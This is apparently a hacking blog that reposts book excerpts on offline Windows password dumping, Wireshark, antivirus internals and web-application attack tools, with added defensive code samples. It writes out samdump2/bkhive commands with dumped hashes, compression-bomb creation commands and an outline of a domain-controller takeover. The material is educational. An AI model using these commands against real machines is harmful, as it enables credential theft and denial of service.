The Best Hacking Books

The most powerful and readable books, which I personally read; all of them are very helpful.


Monday, February 17, 2020

Online Earning And Fav Hacking

Today I will share with all my friends
Online Earning And Fav Hacking Part 1
New online earning and hacking books, which are favourites of all pro hackers. I also learn from them. You must try them; download the pass file to open all the books (Secrets). Free download.




(Ebook - Computer) Hacking The Windows Registry

Anonymous Survival Guide for Citizens in a Revolution

Earning Money Online Is Possible

Hacking Android For Profit

Hack Proofing Your Identity In The Information Age (PDF, free download)


Online Earning And Fav Hacking Part 2: coming tomorrow.

Saturday, February 1, 2020

Kevin Mitnick books

“Physical entry”: slipping into a building of your target company. It’s something I never like to do. Way too risky. Just writing about it makes me practically break out in a cold sweat.


Social engineering (SE) has been largely misunderstood, leading to many differing opinions on what social engineering is and how it works. 


Tuesday, January 21, 2020

Physical Access Attacks Hacking

If an attacker is able to gain physical access to a machine, chances are that he'll hack it. In almost every OS or network device, there exists a “physical backdoor” which allows for manual resetting of a device configuration.
"Technologies used for perimeter security involve, for instance, intrusion detection sensors and alarm systems. In the context of cryptographic implementations, “physical attack” is understood as a term which encompasses all attacks based on physical means against cryptographic devices."

First we look at resetting Microsoft Windows.

Resetting Microsoft Windows
As discussed before, Windows stores local user passwords in the SAM. The SAM is locked by Windows and cannot be accessed, copied or read while Windows is running. However, if we were to boot the same computer with a different OS (say Linux), then the SAM file would no longer be protected. Our newly booted Linux OS would see the SAM file as just another file on the Windows file system. We can then modify the SAM with specialized tools and reset passwords to our liking. Once the Windows machine boots back up, it will have new passwords in its SAM database.

Here we see that the Windows NTFS partition sda1 is mounted with read-only (ro) permissions. Since we need to change the SAM file, we will require read/write permissions:


BT ~ # umount /mnt/sda1/
BT ~ # modprobe fuse
BT ~ # ntfsmount /dev/sda1 /mnt/sda1/
BT ~ # mount
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw)
/dev/sda1 on /mnt/sda1 type fuse (rw,nosuid,nodev,default_permissions,allow_other)
BT ~ #

Now we can dump the SAM file using bkhive and samdump2:

BT ~ # bkhive /mnt/sda1/WINNT/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it
Bootkey: dc155851060590ee807d3c660a437109 
BT ~ # samdump2 /mnt/sda1/WINNT/system32/config/sam system.txt >hashes.txt 
Samdump2 ncuomo@studenti.unina.it 
This product includes cryptographic software written by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
BT ~ # cat hashes.txt
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee::::
NetShowServices:1001:4e239a9b2c8fca59049021d2a350c02c:021c54b8e10a4c420839b49a7cd21a66:::
IUSR_WIN2KSP4:1003:76af34c719386a457aa40990e59dd60e:1c6560db5a2eb3f2da11bfd04d7c5a91:::
IWAM_WIN2KSP4:1004:1cad3d74dee85109bb0b6cba129ef50e:7212a9f44e59a1b73d88fa7d670266db:::


Alternatively, we can modify the SAM directly using a useful tool such as chntpw.
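The hash listing above is in the pwdump format (user:RID:LM hash:NT hash). The following is an added example, not part of the post or the course material it quotes, that reads such a dump from the defender's side and reports what the stored hashes reveal: accounts that still carry an LM hash (a legacy format that should be disabled by policy), LM hashes whose second half is the well-known empty-half value (which means the password is seven characters or shorter), and accounts with no password set. The hash lines are the ones shown above plus one constructed account (svc_backup); the empty-hash constants are public, well-known values.

```python
# Added example: audit a pwdump-style SAM listing for weak password storage.
EMPTY_LM_HALF = "aad3b435b51404ee"             # LM hash of an empty 7-byte half (well-known)
EMPTY_LM = EMPTY_LM_HALF * 2                    # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password (well-known)

# Sample dump: the first three lines are the ones shown above, the last one is
# a constructed account added to show the "no password set" case.
SAMPLE_DUMP = """\
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee::::
NetShowServices:1001:4e239a9b2c8fca59049021d2a350c02c:021c54b8e10a4c420839b49a7cd21a66:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump_line(line):
    """Split one 'user:rid:lm:nt:::' line; returns None for lines that do not fit."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    return {
        "user": parts[0],
        "rid": int(parts[1]),
        "lm": parts[2].lower(),
        "nt": parts[3].lower(),
    }


def audit_account(acct):
    """Return the list of findings for one account."""
    findings = []
    lm, nt = acct["lm"], acct["nt"]
    # samdump2 leaves the NT field empty when no NT hash exists; an NT hash of
    # the empty string means a blank password was set.
    if nt in ("", EMPTY_NT):
        findings.append("no password set")
    # An LM hash that is not the empty-password value means the legacy LM
    # representation is still being stored for this account.
    if lm and lm != EMPTY_LM:
        findings.append("LM hash stored (weak, legacy format)")
        # LM hashes are computed over two 7-character halves; an empty second
        # half means the password fits entirely in the first half.
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password is 7 characters or shorter")
    return findings


def audit_dump(text):
    """Audit every parsable line of a dump; returns {username: [findings]}."""
    report = {}
    for line in text.splitlines():
        acct = parse_pwdump_line(line)
        if acct is not None:
            report[acct["user"]] = audit_account(acct)
    return report


if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:16} {', '.join(findings) or 'no findings'}")
```

The practical mitigation for everything in this section is that offline access to the disk must not yield usable secrets: full-disk encryption with the key protected by firmware or a TPM, a locked boot order, and a policy that stops LM hashes from being stored at all.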


The second way is resetting a password on a Domain Controller.

Resetting a password on a Domain Controller

Windows domain controllers do not store their user passwords in the local SAM, but in Active Directory. Active Directory cannot be manually edited offline, so a different approach is taken. A Windows domain controller can be booted without Active Directory (Active Directory Restore Mode). This is usually done for Active Directory maintenance or defragmentation. When Active Directory is not loaded, the domain controller will temporarily revert to local username authentication, and will once again use the SAM file present on the machine. A possible attack vector would be to reset/crack the domain controller's local administrator password (by SAM manipulation or dumping), then boot it in “Active Directory Restore Mode” and log in with the modified/cracked password. Once logged in, a service is installed which executes the “net user” command (with SYSTEM privileges). Once the domain controller is rebooted and allowed to load Active Directory, the service adds/modifies the user and allows us to log in with our altered password.

Third is resetting a Cisco device.

Resetting a Cisco Device

In Linux, a similar technique is used to reset root passwords. The machine is either booted in single-user mode or booted off a different operating system in order to manually change the /etc/shadow file.

Friday, January 10, 2020

Use of Wireshark


Learning how to use a sniffer effectively is probably one of the most important network-related lessons you can take, and I strongly recommend that you practice as much as possible.






  •  Peeking at a Sniffer
Let's begin by peeking into a Wireshark capture file. This capture was taken as I ran dhclient eth0 and then opened my browser and browsed to http://www.offensive-security.com (a great site for learning hacking). Looking at this for the first time might be overwhelming. However, take a deep breath, examine the packet capture line by line, and apply your knowledge of TCP/IP.


Packet 1: DHCP Request. You ran dhclient, which broadcasts a DHCP request to a local DHCP server. Notice the broadcast destination address 255.255.255.255 and the source IP address 0.0.0.0.
Packet 2: A DHCP server (192.168.1.1) replies in a unicast packet and assigns the IP 192.168.1.107. At this point the browser was opened, attempting to browse to www.offensive-security.com.
Packet 3: ARP Broadcast. You've attempted to send a packet to the Internet, and before your computer can actually send it, it needs to identify the default gateway on the local network. The default gateway IP address is configured on the requesting machine, but the default gateway MAC address is unknown. My machine sends a broadcast to the whole network, asking, “Who has 192.168.1.1? Tell 192.168.1.107.”
Packet 4: All computers on the local subnet receive this broadcast and check whether 192.168.1.1 belongs to them. Only 192.168.1.1 responds to this ARP broadcast and sends an ARP unicast reply to 192.168.1.107, informing it of the MAC address requested.
Packet 5: Now that your computer knows where to send its packets in order for them to reach the Internet, you need to resolve the IP of www.offensive-security.com. Your computer sends a DNS query to the DNS server defined in your TCP/IP settings (24.224.127.143) and asks the DNS server for the IP address (A record) of www.offensive-security.com.
Packet 6: The DNS server replies and tells your computer that the IP address for www.offensive-security.com is 208.88.120.8.
Packet 7: Armed with this information, your computer attempts a three-way handshake (remember that buzzword from TCP/IP?) with 208.88.120.8 on port 80 and sends a SYN request.
Packet 8: The web server responds with an ACK and sends a SYN to your machine.
Packet 9: You send a final ACK to the web server and complete the three-way handshake.
Packet 10: Now that the handshake is complete, your computer can start talking with the service using a specific protocol. Since you're using a web browser, your computer sends an HTTP GET request, which retrieves the index page, and all linked images, to your browser.
Packets 11–end: The main page of www.offensive-security.com, including all linked images, is loaded in your browser.

 Capture and Display Filters (CDF)

Capture dumps are rarely as clear as this, since there is usually a lot of background noise on a network. Various broadcasts, miscellaneous network services, and other running applications all make life harder when it comes to traffic analysis. Wireshark has two very convenient filter schemes: capture filters and display filters. Understanding how to use these filters is the key to conquering Wireshark.


 Following TCP Streams  
As you may have noticed, packets 9–end are a bit difficult to comprehend because they contain fragments of information. Most modern sniffers, Wireshark included, know how to reassemble a specific session and display it in various formats.
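Reassembling a session is what "Follow TCP Stream" does behind the scenes: segments of one direction are ordered by sequence number, exact duplicates are dropped, overlapping retransmissions are trimmed, and holes are reported rather than silently skipped. The following is an added example, not from the post or the course material it quotes, that performs that reassembly over a constructed set of client-side segments of the HTTP request described above. The initial sequence number, the out-of-order delivery, the duplicate and the overlapping retransmission are all constructed for this example.

```python
# Added example: order, de-duplicate and trim TCP segments into one byte stream.

ISN = 1000  # constructed initial sequence number of the client; data starts at ISN + 1

# Constructed segments (seq, payload) for the client -> server direction, as a
# sniffer might see them: out of order, one duplicate, one overlapping retransmit.
SEGMENTS = [
    (1017, b"Host: www.offensive-security.com\r\n"),   # arrives before the request line
    (1001, b"GET / HTTP/1.1\r\n"),
    (1001, b"GET / HTTP/1.1\r\n"),                      # exact duplicate
    (1040, b"urity.com\r\n\r\n"),                       # retransmit overlapping the Host line
]

# Same session with the Host segment never captured, to show gap reporting.
SEGMENTS_WITH_HOLE = [
    (1001, b"GET / HTTP/1.1\r\n"),
    (1040, b"urity.com\r\n\r\n"),
]


def reassemble(segments, isn):
    """Return (stream_bytes, gaps). Gaps are (start_seq, end_seq) ranges with no
    data; their bytes are filled with b'?' so offsets in the stream stay right."""
    expected = isn + 1          # next sequence number we want to see
    data = bytearray()
    gaps = []
    for seq, payload in sorted(segments, key=lambda s: s[0]):
        end = seq + len(payload)
        if end <= expected:
            continue            # everything in this segment was already placed
        if seq > expected:
            gaps.append((expected, seq))
            data.extend(b"?" * (seq - expected))
            expected = seq
        # seq <= expected here: skip the part that overlaps what we already have
        data.extend(payload[expected - seq:])
        expected = end
    return bytes(data), gaps


def http_request_line(stream):
    """First line of the reassembled stream, as 'Follow TCP Stream' would show it."""
    return stream.split(b"\r\n", 1)[0].decode("ascii", "replace")


if __name__ == "__main__":
    stream, gaps = reassemble(SEGMENTS, ISN)
    print(http_request_line(stream), "| gaps:", gaps)
    stream, gaps = reassemble(SEGMENTS_WITH_HOLE, ISN)
    print(http_request_line(stream), "| gaps:", gaps)
```

Whether a reassembler keeps the first or the last copy of overlapping bytes is a policy decision (this one keeps the first); real sniffers and IDS engines make that choice explicitly because different operating systems resolve overlaps differently, and an analyst comparing a capture with what the server actually processed needs to know which policy was applied.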


Tuesday, January 7, 2020

The Antivirus Hackers


Introduction to Antivirus Software 
Antivirus software is designed to prevent computer infections by detecting malicious software, commonly called malware, on your computer and, when appropriate, removing the malware and disinfecting the computer.

What is Antivirus software?
Antivirus software is special security software that aims to give better protection than that offered by the underlying operating system (such as Windows or Mac OS X). AV software uses various techniques to identify malicious software, which often self-protects and hides deep in an operating system.

Typical Misconceptions

  • Discovering known malicious patterns and bad behaviors in programs
  • Discovering known malicious patterns in documents and web pages
  • Discovering known malicious patterns in network packets

Features of Antivirus

The following are common features found in AV products:
  • The capability to scan compressed files and packed executables
  • Tools for performing on-demand or real-time file or directory scanning
  • A self-protection driver to guard against malware attacking the actual AV
  • Firewall and network inspection functionality
  • Command-line and graphical interface tools
  • A daemon or service
  • A management console

Advanced Features
The following are some of the most common advanced features supported by AV products:

  • Packet Filters and Firewalls
  • Self-Protection
  • Anti-Exploiting

Update System

Antivirus software is updated more often than most types of software on your computer. All modern antivirus software implements some sort of auto-updating feature. The components that are updated include the core kernel files, signature files, GUI, tools, libraries, or other product files. These update rules are not set in stone, because sometimes when an update is performed, the entire set of signatures and plug-in files is changed.

Understanding the Update Protocols 
There are some commonalities between all the update protocols:

They use HTTP or HTTPS (or both) for downloading signatures—In some rare cases, FTP has been observed (mainly in obsolete or old products).

They include catalog files—The list of downloadable files and remote relative URIs or full URLs is available in one or more catalog files. Such catalog files may contain information about the supported platforms and different product versions.

They verify the downloaded files—The downloaded update files are usually verified before the old files are updated. Although each antivirus product goes through a verification process, they do so in very different ways, from using simple CRC checks (Cyclic Redundancy Checks) to RSA (a public key-based Crypto system) signatures.

Understanding Antivirus Signatures
Signatures are a key part of any antivirus engine. The signatures are typically hashes or byte-streams that are used to determine whether a file or buffer contains a malicious payload.

Typical Signatures
The following sections cover the most notable signature types.
  • Byte-Streams
The simplest form of an antivirus signature is a byte-stream that is specific to a malware file and that does not normally appear in non-malicious files. An antivirus engine may simply search for this entire string:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

  • Custom Checksums
Most antivirus engines create their own set of CRC-like signatures. 
The interesting point is that such custom checksums do not offer any benefit to antivirus developers (other than using a hashing function that is unknown, which forces a reverse-engineer analyzing the targeted AV engine to discover where that function is, analyze it, and, likely, implement it). 

  • Checksums
The most typical signature-matching algorithm is used by almost all existing AV engines and is based on calculating CRCs. 


MODIFIED CRC ALGORITHMS

All the antivirus engines that have been analyzed so far use the CRC32 algorithm. However, in some cases, the original CRC32 algorithm is not used, but is replaced by a modified version. For example, the tables of constants used by the original algorithm may be changed, or the number of rounds may be changed. This is something that you must consider when analyzing the signatures of the antivirus product being targeted: CRC32 hashes can differ from the original CRC32 algorithm and may cause you some headaches.


Cryptographic Hashes
A cryptographic hash function generates a “signature” that univocally identifies one buffer and just one buffer, which thus reduces the odds of producing a false positive. The antivirus industry decided to use such hash functions because they do not produce false positives.
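The three signature types discussed above (byte-streams, CRC32 checksums including vendor-modified tables, and cryptographic hashes) behave differently when a sample is altered. The following is an added example, not from the post or the book it quotes, of a minimal signature engine that implements all three and scans buffers against them. The EICAR test string is the one shown above; the "modified" CRC table is built from a different polynomial (0x82F63B78, the CRC-32C polynomial) purely to stand in for a vendor-modified table, as the text describes, and the signature database itself is constructed for this example.

```python
# Added example: byte-stream, CRC32 (standard and modified table) and SHA-256 signatures.
import hashlib
import zlib

# Test string shown above (backslash escaped for the Python literal).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

STANDARD_POLY = 0xEDB88320  # reflected CRC-32 polynomial used by zlib/Ethernet/zip
MODIFIED_POLY = 0x82F63B78  # stands in for a vendor-modified table (CRC-32C polynomial)


def make_crc_table(poly):
    """Build the 256-entry lookup table for a reflected CRC-32 variant."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ poly if c & 1 else c >> 1
        table.append(c)
    return table


def crc32(data, table):
    """Table-driven CRC-32; with STANDARD_TABLE this equals zlib.crc32()."""
    crc = 0xFFFFFFFF
    for b in data:
        crc = table[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


STANDARD_TABLE = make_crc_table(STANDARD_POLY)
MODIFIED_TABLE = make_crc_table(MODIFIED_POLY)

# Constructed signature database, derived from the known sample at load time.
SIGNATURES = [
    {"name": "EICAR.bytestream", "kind": "bytestream", "value": EICAR},
    {"name": "EICAR.crc32", "kind": "crc32", "value": crc32(EICAR, STANDARD_TABLE)},
    {"name": "EICAR.sha256", "kind": "sha256", "value": hashlib.sha256(EICAR).hexdigest()},
]


def scan(buffer, signatures=SIGNATURES, table=STANDARD_TABLE):
    """Return the names of all signatures that match the buffer."""
    hits = []
    for sig in signatures:
        kind, value = sig["kind"], sig["value"]
        if kind == "bytestream" and value in buffer:
            hits.append(sig["name"])          # substring search: survives appended data
        elif kind == "crc32" and crc32(buffer, table) == value:
            hits.append(sig["name"])          # whole-buffer checksum: any change breaks it
        elif kind == "sha256" and hashlib.sha256(buffer).hexdigest() == value:
            hits.append(sig["name"])          # whole-buffer hash: same, but collision-resistant
    return hits


if __name__ == "__main__":
    print("exact sample:   ", scan(EICAR))
    print("sample + 1 byte:", scan(EICAR + b"\n"))
    print("standard CRC32: %08x" % crc32(EICAR, STANDARD_TABLE))
    print("modified CRC32: %08x" % crc32(EICAR, MODIFIED_TABLE))
```

Two things the run makes concrete: appending a single byte defeats both whole-buffer signatures while the byte-stream signature still fires, which is why engines combine the types; and an engine that swapped in a modified table yields a different value for the very same input, so an analyst re-implementing a vendor's checksums has to recover the table rather than reuse the standard one.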

  • Fuzzy Hashing

A fuzzy hash signature is the result of a hash function that aims to detect groups of files instead of just a single file, as cryptographic hash functions do. A fuzzy hash algorithm is not bound by the same rules as a cryptographic hash; instead it has the following properties:

Minimal or no diffusion at all—A minimal change in the input should minimally affect the generated output, and only the corresponding block of output, if it affects it at all. In a good cryptographic hash, a minimal change in the input must change the complete hash.

No confusion at all—The relationship between the key and the generated fuzzy hash is easy to identify, corresponding one to one. For example, a tiny change in the first block should change only the first generated output byte (if at all).

A good collision rate—The collision rate must be defined by the actual application. For example, a high collision rate may be acceptable for spam detection, but it may not be suitable for malware detection (because of the high number of false positives it generates). For example, the ls binary generates the following MD5 and ssdeep signatures:

$ md5sum ls
fa97c59cc414e42d4e0e853ddf5b4745  ls
$ ssdeep ls
ssdeep,1.1--blocksize:hash:hash,filename
1536:MW9/IqY+yF00SZJVWCy62Rnm1lPdOHRXSoyZ03uawcfXN4qMlkW:MW9/ZL/T6ilPdotHaqMlkW,"ls"
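The ssdeep output above is a context-triggered piecewise hash: a rolling hash over a few bytes decides where each piece ends, and a cheap hash of each piece becomes one character of the signature, so a local change touches only the characters for the pieces around it. The following is an added example, not from the post or the book it quotes and not ssdeep's actual algorithm, of a deliberately simplified version of that construction (a 7-byte window sum as the rolling hash, FNV-1a as the piece hash, a fixed block size of 64, and difflib's ratio instead of ssdeep's edit-distance score), run over constructed random input to show the "minimal diffusion" property against a cryptographic hash.

```python
# Added example: simplified context-triggered piecewise hashing vs. SHA-256.
import hashlib
import random
from difflib import SequenceMatcher

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
WINDOW = 7                 # bytes covered by the rolling hash (simplified)
FNV_OFFSET = 0x811C9DC5    # FNV-1a 32-bit parameters for the piece hash
FNV_PRIME = 0x01000193


def fuzzy_hash(data, blocksize=64):
    """Emit one signature character per piece; piece boundaries are chosen by
    the rolling hash of the last WINDOW bytes, so they depend only on local context."""
    chars = []
    window = []
    piece_hash, piece_len = FNV_OFFSET, 0
    for b in data:
        window.append(b)
        if len(window) > WINDOW:
            window.pop(0)
        piece_hash = ((piece_hash ^ b) * FNV_PRIME) & 0xFFFFFFFF
        piece_len += 1
        if sum(window) % blocksize == blocksize - 1:      # trigger: end of a piece
            chars.append(ALPHABET[piece_hash & 63])
            piece_hash, piece_len = FNV_OFFSET, 0
    if piece_len:                                          # flush the trailing piece
        chars.append(ALPHABET[piece_hash & 63])
    return f"{blocksize}:{''.join(chars)}"


def similarity(sig_a, sig_b):
    """0-100 score; signatures with different block sizes are not comparable."""
    bs_a, body_a = sig_a.split(":", 1)
    bs_b, body_b = sig_b.split(":", 1)
    if bs_a != bs_b:
        return 0
    return round(100 * SequenceMatcher(None, body_a, body_b).ratio())


def build_samples():
    """Constructed inputs: a random blob, the same blob with one byte flipped,
    and an unrelated random blob of the same size."""
    rng = random.Random(20200107)
    original = bytes(rng.getrandbits(8) for _ in range(4096))
    patched = bytearray(original)
    patched[2048] ^= 0xFF
    unrelated = bytes(rng.getrandbits(8) for _ in range(4096))
    return original, bytes(patched), unrelated


def compare():
    original, patched, unrelated = build_samples()
    return {
        "fuzzy_same_family": similarity(fuzzy_hash(original), fuzzy_hash(patched)),
        "fuzzy_unrelated": similarity(fuzzy_hash(original), fuzzy_hash(unrelated)),
        "sha256_changed": hashlib.sha256(original).hexdigest()
        != hashlib.sha256(patched).hexdigest(),
    }


if __name__ == "__main__":
    original, patched, _ = build_samples()
    print(fuzzy_hash(original))
    print(fuzzy_hash(patched))
    print(compare())
```

The one-byte patch changes the SHA-256 completely but only the one or two signature characters whose pieces contain the changed byte, which is exactly the property that lets a fuzzy signature catch a whole family of slightly repacked samples, at the cost of a collision rate the analyst has to tune per application.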

Graph-Based Hashes for Executable Files

Some advanced antivirus products contain signatures for program graphs. A software program can be divided into two different kinds of graphs:

Call graph—A directed graph showing the relationships between all the functions in a program (that is, a graph displaying all callers and callees of each function in the software piece).

Flow graph—A directed graph showing the relationships between basic blocks (a portion of code with only one entry point and only one exit point) of some specific function.

Denial of Service

Both local and remote denial-of-service (DoS) attacks against antivirus software are possible; indeed, one of the most common attacks is aimed at disabling AV protection.
"A DoS is an attack launched against software or against a machine running some software, with the aim of making the targeted software or machine unavailable."





Local Denial-of-Service Attacks
A local denial of service is a DoS attack that can be launched only from the same machine on which the targeted antivirus software is installed. The following are common types of local DoS attack.

  • Compression Bombs

A simple, well-known, and widely available local denial-of-service attack against antivirus software is the compression bomb, also referred to as a zip bomb or the “zip of death.”

Creating a Simple Compression Bomb
In this section, you create a simple compression bomb using common standard Unix and Linux tools. First you need to create a big zero-filled file with the command dd:

dd if=/dev/zero bs=1024M count=1 > file

After creating this “dummy” file, you need to compress it. You can use any compression tool and format, such as GZip or BZip2. The following command creates a max 2GB dummy file and then directly compresses it with BZip2, resulting in a 1522-byte-long compressed file:

dd if=/dev/zero bs=2048M count=1 | bzip2 -9 > file.bz2

You can quickly check the resulting size by using the wc tool:
$ LANG=C dd if=/dev/zero bs=2048M count=1 | bzip2 -9 | wc -c
0+1 records in
0+1 records out
2147479552 bytes (2.1 GB) copied, 15.619 s, 137 MB/s
1522
This is a really simple compression bomb attack.
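The scanner-side defence against the bomb above is to never inflate an archive to completion before deciding: decompress incrementally and abort as soon as the output size, or the output-to-input ratio, exceeds a limit. The following is an added example, not from the post or the book it quotes, that does this with Python's bz2 streaming decompressor. The sample bomb (1 MiB of zeros compressed with bzip2) and the legitimate log archive are both constructed here, and the limits of 256 KiB output and 200:1 ratio are assumptions chosen for the demonstration.

```python
# Added example: bounded bzip2 decompression that rejects compression bombs early.
import bz2


class DecompressionBombError(Exception):
    """Raised when decompressed output exceeds the configured limits."""


def make_zero_bomb(size=1 << 20):
    """Constructed sample: 1 MiB of zeros compressed with bzip2 (a few dozen bytes)."""
    return bz2.compress(b"\x00" * size, compresslevel=9)


def bounded_bz2_decompress(blob, max_output=256 * 1024, max_ratio=200, chunk=64 * 1024):
    """Decompress at most `chunk` bytes at a time and stop as soon as the output
    size or the output/input ratio exceeds the limits, instead of inflating all of it."""
    dec = bz2.BZ2Decompressor()
    out = bytearray()
    pos = 0
    while not dec.eof:
        if dec.needs_input:
            if pos >= len(blob):
                raise ValueError("truncated bzip2 stream")
            piece = blob[pos:pos + chunk]
            pos += len(piece)
        else:
            piece = b""        # decompressor still holds buffered input from last call
        out += dec.decompress(piece, max_length=chunk)
        if len(out) > max_output:
            raise DecompressionBombError(f"output exceeds {max_output} bytes")
        if pos and len(out) > max_ratio * pos:
            raise DecompressionBombError(f"ratio exceeds {max_ratio}:1 after {pos} input bytes")
    return bytes(out)


def inspect(blob, **limits):
    """Return ('ok', size) or ('rejected', reason) so a scanner can log and move on."""
    try:
        return "ok", len(bounded_bz2_decompress(blob, **limits))
    except DecompressionBombError as exc:
        return "rejected", str(exc)


# Constructed legitimate archive: 200 distinct log lines, modest compression ratio.
LEGIT_PLAIN = b"".join(b"log line %d: service started\n" % i for i in range(200))
LEGIT_BZ2 = bz2.compress(LEGIT_PLAIN)


if __name__ == "__main__":
    bomb = make_zero_bomb()
    print(f"bomb is {len(bomb)} bytes compressed ->", inspect(bomb))
    print(f"legit is {len(LEGIT_BZ2)} bytes compressed ->", inspect(LEGIT_BZ2))
```

The ratio check fires on the very first output chunk of the bomb, so the scanner never allocates more than `chunk` bytes for it; the same pattern applies to nested archives, where the limit has to count the total across all nesting levels rather than per file.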
==================================
Bugs in File Format Parsers
File format parser bugs can also be used locally to prevent an antivirus scanner from detecting malware. A non-trivial example of this is when the malware drops a malformed file that is known to trigger a bug in the antivirus file parser and cause it to die or become stuck (for example, in an infinite loop).
Here is another, easier example of how to make use of a file format bug. Imagine you have two files with the following path structure:

base_dir\file-causing-parsing-bug.bin
base_dir\sub-folder\real-malware.exe

Attacks against Kernel Drivers
Other typical examples of local DoS attacks against antivirus products are those focused on kernel driver vulnerabilities. Most antivirus products for Windows deploy kernel drivers that can be used to protect the antivirus program from being killed, to prevent a debugger from attaching to their services, to install a file system filter driver for real-time file scanning, or to install an NDIS mini-filter to analyze the network traffic. 

These tricks are a useful way, for example, to reboot the machine after performing some action without asking the user for confirmation or requiring high-level privileges. They can also be used in a multistage exploit. A hypothetical, yet possible, scenario follows: 
1. An attacker abuses a vulnerability that allows one of the following: a file to be copied to a user’s Startup directory, a bug that allows a driver to be installed, or a bug that allows a library to be copied in a location that will later be picked up and loaded in the address space of high-privileged processes after rebooting.
 2. The attacker then uses a kernel driver bug to force the machine to reboot so that the changes take effect.

Local DoS vulnerabilities in antivirus kernel drivers are very prolific; a few vulnerabilities appear each year, affecting a wide range of antivirus products from the most popular to the less known. 


Remote Denial-of-Service Attacks
Remote DoS vulnerabilities can also be discovered in antivirus products, as in any other software with an exposed remote surface. A remote denial of service is a DoS attack that can be launched remotely, targeting the antivirus software installed on the victim’s computer. There are many possible remote DoS attack vectors, with the following being the most common:

  • Compression bombs, as in the case of local denial of service
  • Bugs in file format parsers, as in the case of local denial of service
  • Bugs in network protocol parsers
  • Attacks against antivirus network services that listen on network interfaces other than the loopback network interface (localhost IP address, 127.0.0.1)





Saturday, January 4, 2020

Web Application Hacker’s Toolkit


Here we cover some basics of the web application hacker's toolkit.

A Web Application Hacker’s Toolkit


Some attacks on web applications can be performed using only a standard web browser.
Most Important
The most important item in your toolkit falls into this latter category, and operates as an intercepting web proxy, enabling you to view and modify all of the HTTP messages passing between your browser and the target application.
Second Main Category
The second main category of tool is the web application scanner. This is a product designed to automate many of the tasks involved in attacking a web application, from initial mapping through to probing for vulnerabilities.

Web Browsers

A web browser is not exactly a hacking tool, being the standard means by which web applications are designed to be accessed.

Internet Explorer
Microsoft’s Internet Explorer (IE) is currently the most widely used web browser, comprising approximately 60% of the market at the time of writing. Virtually all web applications are designed for and tested on IE, making it a good choice for an attacker because most applications’ content and functionality will be correctly displayed and usable within IE.

Firefox
Firefox is currently the second most widely used web browser, comprising approximately 35% of the market at the time of writing. The majority of web applications work correctly on Firefox; however, there is no native support for ActiveX controls.

Opera
Opera is a relatively little-used browser, having less than 2% of the market share at the time of this writing. Relatively few applications are specifically tested on Opera.

Integrated Testing Suites
After the essential web browser, the most useful item in your toolkit when attacking a web application is an intercepting proxy. There are three leading suites in widespread use, which we will examine in this section:
  • Burp Suite
  • Paros
  • WebScarab


Configuring Your Browser
If you have never set up your browser to use a proxy server, this is trivial to do on any browser. Then perform the steps required for your browser:

Internet Explorer
In Internet Explorer, go to Tools ➪ Internet Options ➪ Connections ➪ LAN settings. Ensure that the Automatically Detect Settings and Use Automatic Configuration Script boxes are not checked. Ensure that the Use a Proxy Server for Your LAN box is checked. In the Address field, enter localhost and in the Port field enter the port used by your proxy. Click the Advanced button, and ensure that the Use the Same Proxy Server for All Protocols box is checked. If the hostname of the application you are attacking is matched by any of the expressions in the Do Not Use Proxy Server for Addresses Beginning With box, remove these expressions. Click OK on all the dialogs to confirm the new configuration.

Web Application Spiders
Web application spiders work in a similar way to traditional web spiders — by requesting web pages, parsing these for links to other pages, and then requesting those pages, continuing recursively until all of a site’s content has been discovered.
To accommodate the differences between functional web applications and traditional web sites, application spiders must go beyond this core function and address various other challenges, such as the following:

>> Forms-based navigation, using drop-down lists, text input, and other methods.

>> JavaScript-based navigation, such as dynamically generated menus.

>> Multistage functions requiring actions to be performed in a defined sequence.

>> Authentication and sessions.

>> The use of parameter-based identifiers, rather than the URL, to specify different content and functionality.

>> The appearance of tokens and other volatile parameters within the URL query string, leading to problems identifying unique content.

>> Checking for the robots.txt file, which is intended to provide a blacklist of URLs that should not be spidered, but which an attacking spider can use to discover additional content.

>> Automatic retrieval of the root of all enumerated directories. This can be useful to check for directory listings or default content (see Chapter 17).

>> Automatic processing and use of cookies issued by the application, to enable spidering to be performed in the context of an authenticated session.

>> Automatic testing of session-dependence of individual pages. This involves requesting each page both with and without any cookies that have been received. If the same content is retrieved, then the page does not require a session or authentication. This can be useful when probing for some kinds of access control flaw (see Chapter 8).

>> Automatic use of the correct Referer header when issuing requests. Some applications may check the contents of this header, and this function ensures that the spider behaves as far as possible like an ordinary browser.

>> Control of other HTTP headers used in automated spidering.

>> Control over the speed and order of automated spider requests, to avoid overwhelming the target, and if necessary behave in a stealthy manner.

[Table: which of these features are supported by Burp Suite, Paros and WebScarab]
